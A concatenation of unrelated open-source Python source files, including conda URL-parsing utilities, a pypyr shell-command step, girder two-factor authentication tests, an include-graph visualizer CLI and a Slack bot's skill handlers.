raise ValueError('n_components can be an integer or a float '
'or None or a list containing 1 or {} of '
'those'.format(n_scales))
def check_model(model, cls):
r"""
Function that checks whether the provided `class` object is a subclass of
the provided base `class`.
Parameters
----------
model : `class`
The object.
cls : `class`
The required base class.
Raises
------
ValueError
Model must be a {cls} instance.
"""
if not isinstance(model, cls):
raise ValueError('Model must be a {} instance.'.format(
name_of_callable(cls)))
def check_algorithm_cls(algorithm_cls, n_scales, base_algorithm_cls):
r"""
Function that checks whether the `list` of `class` objects defined per scale
are subclasses of the provided base `class`.
Parameters
----------
algorithm_cls : `class` or `list` of `class`
The list of objects per scale.
n_scales : `int`
The number of scales.
base_algorithm_cls : `class`
The required base class.
Raises
------
ValueError
algorithm_cls must be a subclass of {base_algorithm_cls} or a list/tuple
of {base_algorithm_cls} subclasses with the same length as the number of
scales {n_scales}
"""
if (isinstance(algorithm_cls, partial) and
base_algorithm_cls in algorithm_cls.func.mro()):
return [algorithm_cls] * n_scales
elif (isinstance(algorithm_cls, type) and
base_algorithm_cls in algorithm_cls.mro()):
return [algorithm_cls] * n_scales
elif len(algorithm_cls) == 1:
return check_algorithm_cls(algorithm_cls[0], n_scales,
base_algorithm_cls)
elif len(algorithm_cls) == n_scales:
return [check_algorithm_cls(a, 1, base_algorithm_cls)[0]
for a in algorithm_cls]
else:
raise ValueError("algorithm_cls must be a subclass of {} or a "
"list/tuple of {} subclasses with the same length "
"as the number of scales {}"
.format(base_algorithm_cls, base_algorithm_cls,
n_scales))
def check_graph(graph, graph_types, param_name, n_scales):
r"""
Checks the provided graph per pyramidal level. The graph must be a
subclass of `graph_types` or a `list` of those.
Parameters
----------
graph : `graph` or `list` of `graph` types
The graph argument to check.
graph_types : `graph` or `tuple` of `graphs`
The `tuple` of allowed graph types.
param_name : `str`
The name of the graph parameter.
n_scales : `int`
The number of pyramidal levels.
Returns
-------
graph : `list` of `graph` types
The graph per scale in a `list`.
Raises
------
ValueError
{param_name} must be a list of length equal to the number of scales.
ValueError
{param_name} must be a list of {graph_types_str}. {} given instead.
"""
# check if the provided graph is a list
if not isinstance(graph, list):
graphs = [graph] * n_scales
elif len(graph) == 1:
graphs = graph * n_scales
elif len(graph) == n_scales:
graphs = graph
else:
raise ValueError('{} must be a list of length equal to the number of '
'scales.'.format(param_name))
# check if the provided graph_types is a list
if not isinstance(graph_types, list):
graph_types = [graph_types]
# check each member of the graphs list
for g in graphs:
if g is not None:
if type(g) not in graph_types:
graph_types_str = ' or '.join(gt.__name__ for gt in graph_types)
raise ValueError('{} must be a list of {}. {} given '
'instead.'.format(param_name, graph_types_str,
type(g).__name__))
return graphs
|
conda/common/url.py
|
jack-pappas/conda
| 4,825 |
76000
|
<gh_stars>1000+
# -*- coding: utf-8 -*-
# Copyright (C) 2012 Anaconda, Inc
# SPDX-License-Identifier: BSD-3-Clause
from __future__ import absolute_import, division, print_function, unicode_literals
import codecs
from getpass import getpass
from os.path import abspath, expanduser
import re
import socket
from .compat import input, on_win
from .path import split_filename, strip_pkg_extension
from .._vendor.auxlib.decorators import memoize
from .._vendor.urllib3.exceptions import LocationParseError
from .._vendor.urllib3.util.url import Url, parse_url
try: # pragma: py2 no cover
# Python 3
from urllib.parse import (quote, quote_plus, unquote, unquote_plus)
except ImportError: # pragma: py3 no cover
# Python 2
from urllib import (quote, quote_plus, unquote, unquote_plus) # NOQA
def hex_octal_to_int(ho):
ho = ord(ho)
o0 = ord('0')
o9 = ord('9')
oA = ord('A')
oF = ord('F')
res = ho - o0 if ho >= o0 and ho <= o9 else (ho - oA + 10) if ho >= oA and ho <= oF else None
return res
@memoize
def percent_decode(path):
# This is not fast so avoid when we can.
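# e.g. percent_decode('a%20b') returns 'a b'; note that only uppercase hex escapes
# (%20, %2F, ...) are matched by the regex below.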
if '%' not in path:
return path
ranges = []
for m in re.finditer(r'(%[0-9A-F]{2})', path):
ranges.append((m.start(), m.end()))
if not len(ranges):
return path
# Sorry! Correctness is more important than speed at the moment.
# Should use a map + lambda eventually.
result = b''
skips = 0
for i, c in enumerate(path):
if skips > 0:
skips -= 1
continue
c = c.encode('ascii')
emit = c
if c == b'%':
for r in ranges:
if i == r[0]:
import struct
emit = struct.pack(
"B", hex_octal_to_int(path[i+1])*16 + hex_octal_to_int(path[i+2]))
skips = 2
break
if emit:
result += emit
return codecs.utf_8_decode(result)[0]
file_scheme = 'file://'
# Keeping this around for now, need to combine with the same function in conda/common/path.py
"""
def url_to_path(url):
assert url.startswith(file_scheme), "{} is not a file-scheme URL".format(url)
decoded = percent_decode(url[len(file_scheme):])
if decoded.startswith('/') and decoded[2] == ':':
# A Windows path.
decoded.replace('/', '\\')
return decoded
"""
@memoize
def path_to_url(path):
if not path:
raise ValueError('Not allowed: %r' % path)
if path.startswith(file_scheme):
try:
path.decode('ascii')
except UnicodeDecodeError:
raise ValueError('Non-ascii not allowed for things claiming to be URLs: %r' % path)
return path
path = abspath(expanduser(path)).replace('\\', '/')
# We do not use urljoin here because we want to take our own
# *very* explicit control of how paths get encoded into URLs.
# We should not follow any RFCs on how to encode and decode
# them, we just need to make sure we can represent them in a
# way that will not cause problems for whatever amount of
# urllib processing we *do* need to do on them (which should
# be none anyway, but I doubt that is the case). I have gone
# for ASCII and % encoding of everything not alphanumeric or
# not in `!'()*-._/:`. This should be pretty safe.
#
# To avoid risking breaking the internet, this code only runs
# for `file://` URLs.
#
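# For example (a sketch; the exact result depends on the platform and on abspath/expanduser):
# on a POSIX system path_to_url('/tmp/pkgs') gives 'file:///tmp/pkgs', and a Windows path
# such as 'C:\\pkgs' becomes 'file:///C:/pkgs'.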
percent_encode_chars = "!'()*-._/\\:"
percent_encode = lambda s: "".join(["%%%02X" % ord(c), c]
[c < "{" and c.isalnum() or c in percent_encode_chars]
for c in s)
if any(ord(char) >= 128 for char in path):
path = percent_encode(path.decode('unicode-escape')
if hasattr(path, 'decode')
else bytes(path, "utf-8").decode('unicode-escape'))
# https://blogs.msdn.microsoft.com/ie/2006/12/06/file-uris-in-windows/
if len(path) > 1 and path[1] == ':':
path = file_scheme + '/' + path
else:
path = file_scheme + path
return path
@memoize
def urlparse(url):
if on_win and url.startswith('file:'):
url = url.replace('\\', '/')
return parse_url(url)
def url_to_s3_info(url):
"""Convert an s3 url to a tuple of bucket and key.
Examples:
>>> url_to_s3_info("s3://bucket-name.bucket/here/is/the/key")
('bucket-name.bucket', '/here/is/the/key')
"""
parsed_url = parse_url(url)
assert parsed_url.scheme == 's3', "You can only use s3: urls (not %r)" % url
bucket, key = parsed_url.host, parsed_url.path
return bucket, key
def is_url(url):
"""
Examples:
>>> is_url(None)
False
>>> is_url("s3://some/bucket")
True
"""
if not url:
return False
try:
return urlparse(url).scheme is not None
except LocationParseError:
return False
def is_ipv4_address(string_ip):
"""
Examples:
>>> [is_ipv4_address(ip) for ip in ('8.8.8.8', '192.168.10.10', '255.255.255.255')]
[True, True, True]
>>> [is_ipv4_address(ip) for ip in ('8.8.8', '192.168.10.10.20', '256.255.255.255', '::1')]
[False, False, False, False]
"""
try:
socket.inet_aton(string_ip)
except socket.error:
return False
return string_ip.count('.') == 3
def is_ipv6_address(string_ip):
"""
Examples:
>> [is_ipv6_address(ip) for ip in ('::1', '2001:db8:85a3::370:7334', '1234:'*7+'1234')]
[True, True, True]
>> [is_ipv6_address(ip) for ip in ('192.168.10.10', '1234:'*8+'1234')]
[False, False]
"""
try:
inet_pton = socket.inet_pton
except AttributeError:
return is_ipv6_address_win_py27(string_ip)
try:
inet_pton(socket.AF_INET6, string_ip)
except socket.error:
return False
return True
def is_ipv6_address_win_py27(string_ip):
"""
Examples:
>>> [is_ipv6_address_win_py27(ip) for ip in ('::1', '1234:'*7+'1234')]
[True, True]
>>> [is_ipv6_address_win_py27(ip) for ip in ('192.168.10.10', '1234:'*8+'1234')]
[False, False]
"""
# python 2.7 on windows does not have socket.inet_pton
return bool(re.match(r"" # lgtm [py/regex/unmatchable-dollar]
r"^(((?=.*(::))(?!.*\3.+\3))\3?|[\dA-F]{1,4}:)"
r"([\dA-F]{1,4}(\3|:\b)|\2){5}"
r"(([\dA-F]{1,4}(\3|:\b|$)|\2){2}|"
r"(((2[0-4]|1\d|[1-9])?\d|25[0-5])\.?\b){4})\Z",
string_ip,
flags=re.DOTALL | re.IGNORECASE))
def is_ip_address(string_ip):
"""
Examples:
>> is_ip_address('192.168.10.10')
True
>> is_ip_address('::1')
True
>> is_ip_address('www.google.com')
False
"""
return is_ipv4_address(string_ip) or is_ipv6_address(string_ip)
def join(*args):
start = '/' if not args[0] or args[0].startswith('/') else ''
return start + '/'.join(y for y in (x.strip('/') for x in args if x) if y)
join_url = join
def has_scheme(value):
return re.match(r'[a-z][a-z0-9]{0,11}://', value)
def strip_scheme(url):
"""
Examples:
>>> strip_scheme("https://www.conda.io")
'www.conda.io'
>>> strip_scheme("s3://some.bucket/plus/a/path.ext")
'some.bucket/plus/a/path.ext'
"""
return url.split('://', 1)[-1]
def mask_anaconda_token(url):
_, token = split_anaconda_token(url)
return url.replace(token, "<TOKEN>", 1) if token else url
def split_anaconda_token(url):
"""
Examples:
>>> split_anaconda_token("https://1.2.3.4/t/tk-123-456/path")
(u'https://1.2.3.4/path', u'tk-123-456')
>>> split_anaconda_token("https://1.2.3.4/t//path")
(u'https://1.2.3.4/path', u'')
>>> split_anaconda_token("https://some.domain/api/t/tk-123-456/path")
(u'https://some.domain/api/path', u'tk-123-456')
>>> split_anaconda_token("https://1.2.3.4/conda/t/tk-123-456/path")
(u'https://1.2.3.4/conda/path', u'tk-123-456')
>>> split_anaconda_token("https://1.2.3.4/path")
(u'https://1.2.3.4/path', None)
>>> split_anaconda_token("https://10.2.3.4:8080/conda/t/tk-123-45")
(u'https://10.2.3.4:8080/conda', u'tk-123-45')
"""
_token_match = re.search(r'/t/([a-zA-Z0-9-]*)', url)
token = _token_match.groups()[0] if _token_match else None
cleaned_url = url.replace('/t/' + token, '', 1) if token is not None else url
return cleaned_url.rstrip('/'), token
def split_platform(known_subdirs, url):
"""
Examples:
>>> from conda.base.constants import KNOWN_SUBDIRS
>>> split_platform(KNOWN_SUBDIRS, "https://1.2.3.4/t/tk-123/linux-ppc64le/path")
(u'https://1.2.3.4/t/tk-123/path', u'linux-ppc64le')
"""
_platform_match = _split_platform_re(known_subdirs).search(url)
platform = _platform_match.groups()[0] if _platform_match else None
cleaned_url = url.replace('/' + platform, '', 1) if platform is not None else url
return cleaned_url.rstrip('/'), platform
@memoize
def _split_platform_re(known_subdirs):
_platform_match_regex = r'/(%s)(?:/|$)' % r'|'.join(r'%s' % d for d in known_subdirs)
return re.compile(_platform_match_regex, re.IGNORECASE)
def has_platform(url, known_subdirs):
url_no_package_name, _ = split_filename(url)
if not url_no_package_name:
return None
maybe_a_platform = url_no_package_name.rsplit('/', 1)[-1]
return maybe_a_platform in known_subdirs and maybe_a_platform or None
def split_scheme_auth_token(url):
"""
Examples:
>>> split_scheme_auth_token("https://u:[email protected]/t/x1029384756/more/path")
('conda.io/more/path', 'https', 'u:p', 'x1029384756')
>>> split_scheme_auth_token(None)
(None, None, None, None)
"""
if not url:
return None, None, None, None
cleaned_url, token = split_anaconda_token(url)
url_parts = urlparse(cleaned_url)
remainder_url = Url(host=url_parts.host, port=url_parts.port, path=url_parts.path,
query=url_parts.query).url
return remainder_url, url_parts.scheme, url_parts.auth, token
def split_conda_url_easy_parts(known_subdirs, url):
# scheme, auth, token, platform, package_filename, host, port, path, query
cleaned_url, token = split_anaconda_token(url)
cleaned_url, platform = split_platform(known_subdirs, cleaned_url)
_, ext = strip_pkg_extension(cleaned_url)
cleaned_url, package_filename = cleaned_url.rsplit('/', 1) if ext else (cleaned_url, None)
# TODO: split out namespace using regex
url_parts = urlparse(cleaned_url)
return (url_parts.scheme, url_parts.auth, token, platform, package_filename, url_parts.host,
url_parts.port, url_parts.path, url_parts.query)
@memoize
def get_proxy_username_and_pass(scheme):
username = input("\n%s proxy username: " % scheme)
passwd = getpass("Password: ")
return username, passwd
def add_username_and_password(url, username, password):
url_parts = parse_url(url)._asdict()
url_parts['auth'] = username + ':' + quote(password, '')
return Url(**url_parts).url
def maybe_add_auth(url, auth, force=False):
"""Add auth if the url doesn't currently have it.
By default, does not replace auth if it already exists. Setting ``force`` to ``True``
overrides this behavior.
Examples:
>>> maybe_add_auth("https://www.conda.io", "user:passwd")
'https://user:[email protected]'
>>> maybe_add_auth("https://www.conda.io", "")
'https://www.conda.io'
"""
if not auth:
return url
url_parts = urlparse(url)._asdict()
if url_parts['auth'] and not force:
return url
url_parts['auth'] = auth
return Url(**url_parts).url
def maybe_unquote(url):
return unquote_plus(remove_auth(url)) if url else url
def remove_auth(url):
url_parts = parse_url(url)._asdict()
if url_parts['auth']:
del url_parts['auth']
return Url(**url_parts).url
if __name__ == "__main__":
import doctest
doctest.testmod()
|
pypyr/steps/dsl/cmd.py
|
mofm/pypyr
| 261 |
76009
|
<gh_stars>100-1000
"""pypyr step yaml definition for commands - domain specific language."""
import shlex
import subprocess
import logging
from pypyr.errors import ContextError
from pypyr.utils import types
# logger means the log level will be set correctly
logger = logging.getLogger(__name__)
class CmdStep():
"""A pypyr step that represents a command runner step.
This models a step that takes config like this:
cmd: <<cmd string>>
OR, as a dict
cmd:
run: str. mandatory. command + args to execute.
save: bool. defaults False. save output to cmdOut.
If save is True, will save the output to context as follows:
cmdOut:
returncode: 0
stdout: 'stdout str here. None if empty.'
stderr: 'stderr str here. None if empty.'
cmdOut.returncode is the exit status of the called process. Typically 0
means OK. A negative value -N indicates that the child was terminated by
signal N (POSIX only).
The run_step method does the actual work. init loads the yaml.
"""
def __init__(self, name, context):
"""Initialize the CmdStep.
The step config in the context dict looks like this:
cmd: <<cmd string>>
OR, as a dict
cmd:
run: str. mandatory. command + args to execute.
save: bool. optional. defaults False. save output to cmdOut.
cwd: str/path. optional. if specified, change the working
directory just for the duration of the command.
Args:
name: Unique name for step. Likely __name__ of calling step.
context: pypyr.context.Context. Look for config in this context
instance.
"""
assert name, ("name parameter must exist for CmdStep.")
assert context, ("context param must exist for CmdStep.")
# this way, logs output as the calling step, which makes more sense
# to end-user than a mystery steps.dsl.blah logging output.
self.logger = logging.getLogger(name)
context.assert_key_has_value(key='cmd', caller=name)
self.context = context
self.is_save = False
cmd_config = context.get_formatted('cmd')
if isinstance(cmd_config, str):
self.cmd_text = cmd_config
self.cwd = None
self.logger.debug("Processing command string: %s", cmd_config)
elif isinstance(cmd_config, dict):
context.assert_child_key_has_value(parent='cmd',
child='run',
caller=name)
self.cmd_text = cmd_config['run']
self.is_save = types.cast_to_bool(cmd_config.get('save', False))
cwd_string = cmd_config.get('cwd', None)
if cwd_string:
self.cwd = cwd_string
self.logger.debug("Processing command string in dir "
"%s: %s", self.cwd, self.cmd_text)
else:
self.cwd = None
self.logger.debug("Processing command string: %s",
self.cmd_text)
else:
raise ContextError(f"{name} cmd config should be either a simple "
"string cmd='mycommandhere' or a dictionary "
"cmd={'run': 'mycommandhere', 'save': False}.")
def run_step(self, is_shell):
"""Run a command.
Runs a program or executable. If is_shell is True, executes the command
through the shell.
Args:
is_shell: bool. defaults False. Set to true to execute cmd through
the default shell.
"""
assert is_shell is not None, ("is_shell param must exist for CmdStep.")
# why? If shell is True, it is recommended to pass args as a string
# rather than as a sequence.
if is_shell:
args = self.cmd_text
else:
args = shlex.split(self.cmd_text)
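# e.g. shlex.split('echo "hello world"') -> ['echo', 'hello world'], so quoted
# arguments survive as single argv entries when not running through the shell.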
if self.is_save:
completed_process = subprocess.run(args,
cwd=self.cwd,
shell=is_shell,
# capture_output=True,only>py3.7
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
# text=True, only>=py3.7,
universal_newlines=True)
self.context['cmdOut'] = {
'returncode': completed_process.returncode,
'stdout': (completed_process.stdout.rstrip()
if completed_process.stdout else None),
'stderr': (completed_process.stderr.rstrip()
if completed_process.stderr else None)
}
# when capture is true, output doesn't write to stdout
self.logger.info("stdout: %s", completed_process.stdout)
if completed_process.stderr:
self.logger.error("stderr: %s", completed_process.stderr)
            # don't swallow the error, because it's the Step swallow decorator's
            # responsibility to decide whether to ignore it or not.
completed_process.check_returncode()
else:
# check=True throws CalledProcessError if exit code != 0
subprocess.run(args, shell=is_shell, check=True, cwd=self.cwd)
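# --- usage sketch (added for illustration; relies only on the calls made above,
# --- assuming pypyr.context.Context provides assert_key_has_value/get_formatted):
#   from pypyr.context import Context
#   context = Context({'cmd': {'run': 'echo hello', 'save': True}})
#   CmdStep(name='mystep', context=context).run_step(is_shell=False)
#   context['cmdOut']   # -> {'returncode': 0, 'stdout': 'hello', 'stderr': None}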
|
t_1000/__init__.py
|
chao5645/T-1000
| 111 |
76018
|
<filename>t_1000/__init__.py
from t_1000.application import T1000
|
test/test_user_otp.py
|
HailLab/girder
| 395 |
76023
|
# -*- coding: utf-8 -*-
import pytest
from girder.exceptions import AccessException
from girder.models.setting import Setting
from girder.models.user import User
from girder.settings import SettingKey
from pytest_girder.assertions import assertStatus, assertStatusOk
def testInitializeOtp(user):
# The logic for the server hostname as the issuer cannot be tested here, since there is no
# current request, but that logic is explicitly tested in testOtpApiWorkflow
Setting().set(SettingKey.BRAND_NAME, 'Branded Girder')
otpUris = User().initializeOtp(user)
# A URI for TOTP should be returned
assert otpUris['totpUri'].startswith('otpauth://')
assert user['login'] in otpUris['totpUri']
assert 'issuer=Branded%20Girder' in otpUris['totpUri']
# OTP should not be enabled yet, since it's not finalized
assert user['otp']['enabled'] is False
# TOTP parameters should be generated
assert 'totp' in user['otp']
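# Illustrative shape of the provisioning URI asserted above (values hypothetical;
# the secret parameter comes from the TOTP URI convention, not from this test):
#   otpauth://totp/Branded%20Girder:login?secret=BASE32SECRET&issuer=Branded%20Girder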
def testHasOtpEnabled(user):
assert User().hasOtpEnabled(user) is False
User().initializeOtp(user)
# OTP is not yet enabled
assert User().hasOtpEnabled(user) is False
user['otp']['enabled'] = True
assert User().hasOtpEnabled(user) is True
def _tokenFromTotpUri(totpUri, valid=True):
# Create an external TOTP instance
from passlib.totp import TOTP
totp = TOTP.from_uri(totpUri)
# Generate a valid token
otpToken = totp.generate().token
if not valid:
# Increment the token by 1 to invalidate it
otpToken = '%06d' % ((int(otpToken) + 1) % int(1e6))
return otpToken
def testVerifyOtp(server, user):
# Enable OTP
otpUris = User().initializeOtp(user)
user['otp']['enabled'] = True
# Generate an invalid token
otpToken = _tokenFromTotpUri(otpUris['totpUri'], False)
with pytest.raises(AccessException):
User().verifyOtp(user, otpToken)
# Generate a valid token
otpToken = _tokenFromTotpUri(otpUris['totpUri'])
# Verify the token, which should succeed without raising an exception
User().verifyOtp(user, otpToken)
# Re-verify the same token, which should fail
# The "server" fixture is necessary for this to work
with pytest.raises(AccessException):
User().verifyOtp(user, otpToken)
def testAuthenticateWithOtp(user):
# Providing an unnecessary token should fail
with pytest.raises(AccessException):
        User().authenticate('user', 'password', '123456')  # any dummy OTP token
# Enable OTP and save user
otpUris = User().initializeOtp(user)
user['otp']['enabled'] = True
User().save(user)
# Providing no token should now fail
with pytest.raises(AccessException):
User().authenticate('user', 'password')
# Generate a valid token
otpToken = _tokenFromTotpUri(otpUris['totpUri'])
# Authenticate successfully with the valid token
User().authenticate('user', 'password', otpToken)
def testAuthenticateWithOtpConcatenated(user):
# Non-OTP-user authentication should still succeed with "otpToken=True"
User().authenticate('user', 'password', True)
# Enable OTP and save user
otpUris = User().initializeOtp(user)
user['otp']['enabled'] = True
User().save(user)
# Authentication should now fail
with pytest.raises(AccessException):
User().authenticate('user', 'password', True)
# Generate a valid token
otpToken = _tokenFromTotpUri(otpUris['totpUri'])
# Authenticate successfully with the valid token
User().authenticate('user', 'password' + otpToken, True)
def testOtpApiWorkflow(server, user):
# Try to finalize OTP before it's been initialized
resp = server.request(
path='/user/%s/otp' % user['_id'], method='PUT', user=user,
additionalHeaders=[('Girder-OTP', '123456')])
# This should fail cleanly
assertStatus(resp, 400)
assert 'not initialized' in resp.json['message']
# Try to disable OTP before it's been enabled
resp = server.request(path='/user/%s/otp' % user['_id'], method='DELETE', user=user)
# This should fail cleanly
assertStatus(resp, 400)
assert 'not enabled' in resp.json['message']
# Initialize OTP
resp = server.request(path='/user/%s/otp' % user['_id'], method='POST', user=user)
assertStatusOk(resp)
# Save the URI
totpUri = resp.json['totpUri']
# Test the logic for server hostname as OTP URI issuer
assert 'issuer=127.0.0.1' in totpUri
# Login without an OTP
    resp = server.request(path='/user/authentication', method='GET', basicAuth='user:password')
# Since OTP has not been finalized, this should still succeed
assertStatusOk(resp)
# Finalize without an OTP
resp = server.request(
path='/user/%s/otp' % user['_id'], method='PUT', user=user)
assertStatus(resp, 400)
assert 'Girder-OTP' in resp.json['message']
# Finalize with an invalid OTP
resp = server.request(
path='/user/%s/otp' % user['_id'], method='PUT', user=user,
additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri, False))])
assertStatus(resp, 403)
assert 'validation failed' in resp.json['message']
# Finalize with a valid OTP
resp = server.request(
path='/user/%s/otp' % user['_id'], method='PUT', user=user,
additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri))])
assertStatusOk(resp)
# The valid token from this time period was used to finalize OTP; to prevent having to wait for
# the next time period, flush the rateLimitBuffer
from girder.utility._cache import rateLimitBuffer
rateLimitBuffer.invalidate()
# Login without an OTP
resp = server.request(path='/user/authentication', method='GET', basicAuth='user:password')
assertStatus(resp, 401)
assert 'Girder-OTP' in resp.json['message']
# Login with an invalid OTP
resp = server.request(
path='/user/authentication', method='GET', basicAuth='user:password',
additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri, False))])
assertStatus(resp, 401)
assert 'Token did not match' in resp.json['message']
# Login with a valid OTP
resp = server.request(
path='/user/authentication', method='GET', basicAuth='user:password',
additionalHeaders=[('Girder-OTP', _tokenFromTotpUri(totpUri))])
assertStatusOk(resp)
# Disable OTP
resp = server.request(path='/user/%s/otp' % user['_id'], method='DELETE', user=user)
assertStatusOk(resp)
|
ig/main.py
|
goldsborough/
| 204 |
76029
|
'''Entry point and command line parsing for ig.'''
from __future__ import print_function
import argparse
import logging
import os
import sys
from ig import colors, graph, serve, walk
def setup_logging():
'''Sets up the root logger.'''
handler = logging.StreamHandler(sys.stderr)
formatter = logging.Formatter('[%(levelname)s] %(message)s')
handler.setFormatter(formatter)
log = logging.getLogger(__package__)
log.addHandler(handler)
log.setLevel(logging.INFO)
return log
def parse_arguments(args):
'''
Sets up the command line argument parser and parses arguments.
Args:
        args: The list of arguments passed to the command line
Returns:
The parsed arguments.
'''
parser = argparse.ArgumentParser(description='Visualize C++ include graphs')
parser.add_argument('directories',
nargs='+',
help='The directories to inspect')
parser.add_argument('--pattern',
action='append',
default=['*.[ch]pp', '*.[ch]'],
dest='patterns',
help='The file (glob) patterns to look for')
parser.add_argument('-i', '-I', '--prefix',
action='append',
dest='prefixes',
default=[os.getcwd()],
help='An include path for headers to recognize')
parser.add_argument('-v', '--verbose',
action='store_true',
help='Turn on verbose output')
parser.add_argument('-p', '--port',
type=int,
default=8080,
help='The port to serve the visualization on')
parser.add_argument('-o', '--open',
action='store_true',
help='Open the webpage immediately')
parser.add_argument('-j', '--json',
action='store_true',
help='Print the graph JSON instead of serving it')
parser.add_argument('-d', '--dir',
dest='directory',
help='The directory to store the served files in. If '
'not supplied, a temporary directory is created.')
parser.add_argument('--relation',
choices=['includes', 'included-by'],
default='included-by',
help='The relation of edges in the graph')
parser.add_argument('--min-degree',
type=float,
default=0.1,
help='The initial minimum degree nodes should have to '
'be displayed')
parser.add_argument('--group-granularity',
type=int,
default=2,
help='How coarse to group nodes (by folder)')
parser.add_argument('--full-path',
action='store_true',
help='If set, shows the full path for nodes')
parser.add_argument('--colors',
type=lambda p: colors.Colors(map(int, p.split(','))),
default='234, 82, 77',
help='The base RGB colors separated by commas')
parser.add_argument('--color-variation',
type=int,
default=200,
help='The variation in RGB around the base colors')
parser.add_argument('--color-alpha-min',
type=float,
default=0.7,
help='The minimum alpha value for colors')
args = parser.parse_args(args)
# Necessary for standard includes
args.prefixes.append('')
if not (0 <= args.color_alpha_min <= 1):
raise RuntimeError('--color-alpha-min must be in interval [0, 1]')
args.colors.variation = args.color_variation
args.colors.alpha_min = args.color_alpha_min
return args
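# --- example invocation (hypothetical paths; assumes the console script is named
# --- `ig`; flags correspond to the options defined above):
#   ig include/ src/ --pattern '*.h' -I include --relation includes --port 9000 --open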
def make_json(args, graph_json):
'''
Creates the JSON payload for the visualization.
Args:
args: The command line arguments.
graph_json: The JSON dict from the graph.
Returns:
The payload.
'''
if args.json:
print(graph_json)
sys.exit(0)
# Additional settings to configure the visualization
settings = dict(initialDegree=args.min_degree)
return dict(settings=settings, graph=graph_json)
def main():
log = setup_logging()
args = parse_arguments(sys.argv[1:])
if args.verbose:
log.setLevel(logging.DEBUG)
log.debug('Received arguments: %s', args)
include_graph = graph.Graph(args.relation,
args.full_path,
args.colors,
args.group_granularity)
walk.walk(include_graph, args)
if include_graph.is_empty:
log.debug('Could not find a single node, exiting')
sys.exit(-1)
json = make_json(args, include_graph.to_json())
with serve.Server(args.directory) as server:
server.write(json)
server.run(args.open, args.port)
log.info('Shutting down')
if __name__ == '__main__':
main()
|
kino/functions.py
|
DongjunLee/kino-bot
| 109 |
76043
|
<reponame>DongjunLee/kino-bot
# -*- coding: utf-8 -*-
import random
import re
import subprocess
import time
from .background import schedule
from .nlp.ner import NamedEntitiyRecognizer
from .skills.bus import Bus
from .skills.feed import FeedNotifier
from .skills.github import GithubManager
from .skills.humor import Humor
from .skills.maxim import Maxim
from .skills.naver import Naver
from .skills.question import AttentionQuestion
from .skills.question import HappyQuestion
from .skills.rescue_time import RescueTime
from .skills.samhangsi.generator import SamhangSiGenerator
from .skills.summary import Summary
from .skills.todoist import TodoistManager
from .skills.toggl import TogglManager
from .skills.trello import TrelloManager
from .skills.twitter import TwitterManager
from .skills.weather import Weather
from .slack.slackbot import SlackerAdapter
from .slack.resource import MsgResource
from .utils.arrow import ArrowUtil
from .utils.data_handler import DataHandler
from .utils.data_loader import SkillData
from .utils.data_loader import FeedData
from .utils.logger import Logger
from .utils.member import Member
class Functions(object):
IDEA_LIST = "Inbox"
KANBAN_TASKS = "Tasks"
KANBAN_DOING = "Doing"
KANBAN_DONE = "Done"
KANBAN_BREAK = "Break"
def __init__(self, slackbot=None):
self.data_handler = DataHandler()
self.registered = RegisteredFuctions().list
self.logger = Logger().get_logger()
if slackbot is None:
self.slackbot = SlackerAdapter()
else:
self.slackbot = slackbot
def check_go_to_bed(self):
summary = Summary()
summary.check_go_to_bed()
summary.check_commit_count()
self._reset_data()
def _reset_data(self):
self.data_handler.edit_cache(("feed_links", []), fname="cache_feed.json") # NOTE: hard-code
self.data_handler.edit_cache(("tweet_ids", []), fname="cache_feed.json")
FeedData().reset()
SkillData().reset()
def feed_notify(self):
"""
keyword: [["피드", "알다"], ["피드", "있다"], ["새 소식", "있다"]]
description: "Feed"
icon: ":spock-hand: "
"""
self.slackbot.send_message(text=MsgResource.FEED_ACK)
feed_notifier = FeedNotifier()
feed_notifier.notify_all()
twitter_manager = TwitterManager()
twitter_manager.notify_popular_tweet()
def health_check(self):
bot_id = self.slackbot.get_bot_id()
if self.slackbot.is_active(bot_id):
self.logger.info("Healthy.")
else:
# NOTE: restart with script.
subprocess.call("sh ~/restart_kino.sh", shell=True)
def holiday_setting(self):
"""
keyword: ["휴일", "쉬는 날", "holiday"]
description: "Holiday!"
icon: ":relaxed: "
"""
Summary().record_holiday(True)
self.slackbot.send_message(text=MsgResource.HOLIDAY)
def good_morning(self):
"""
keyword: ["굿모닝", "좋은 아침", "good morning"]
description: "Good Morning"
icon: ":sunrise: "
"""
self.slackbot.send_message(text=MsgResource.PROFILE_WAKE_UP)
self.forecast(timely="daily")
trello = TrelloManager()
trello.clean_board(except_list_name=[self.IDEA_LIST, self.KANBAN_BREAK])
self.kanban_sync()
def good_night(self):
"""
keyword: ["굿나잇", "굿밤", "자다", "good night"]
description: "Good Night"
icon: ":night_with_stars: "
"""
self.slackbot.send_message(text=MsgResource.PROFILE_GO_TO_BED)
summary = Summary()
summary.check_commit_count()
self._reset_data()
def activity_task_sync(self):
"""
keyword: ["토글 싱크"]
description: "Toggl <-> Task Sync"
icon: ":tornado: "
"""
toggl = TogglManager(slackbot=self.slackbot)
toggl.sync_task()
def air_quality(self):
"""
keyword: ["공기질", "미세먼지", "air quality"]
description: "Air quality forecast. (can use only Korea [airkoreaPy](https://github.com/DongjunLee/airkoreaPy))"
icon: ":factory: "
"""
weather = Weather(slackbot=self.slackbot)
weather.air_quality()
def attention_question(self, text: str = None):
"""
keyword: [["집중도", "조사"], ["집중도", "확인"], ["attention", "question"]]
description: "Attention survey after do task."
icon: ":writing_hand: "
"""
attention = AttentionQuestion(slackbot=self.slackbot)
attention.question()
def attention_report(self, timely: str = "daily"):
"""
keyword: [["집중도", "리포트"], ["attention", "report"]]
description: "Attention Report."
icon: ":writing_hand: "
"""
if timely is None:
timely = "daily"
attention = AttentionQuestion(slackbot=self.slackbot)
attention.report(timely=timely)
def bus_stop(self, station_id: str = None, real_time: str = None):
"""
keyword: [["버스", "도착"], ["버스", "언제"], ["버스", "조회"]]
description: "Bus arrival information. (can use only Korea (gbus api))"
icon: ":oncoming_bus: "
"""
if real_time is None:
real_time = False
bus = Bus(slackbot=self.slackbot)
bus.arrive_info(station_id, real_time=real_time)
def forecast(self, timely: str = "current"):
"""
keyword: ["날씨", "예보", "weather", "forecast"]
description: "Weather forecast. (using [darksky](https://darksky.net/))"
icon: ":sun_with_face: "
"""
if timely is None:
timely = "current"
weather = Weather(slackbot=self.slackbot)
weather.forecast(timely=timely)
self.air_quality()
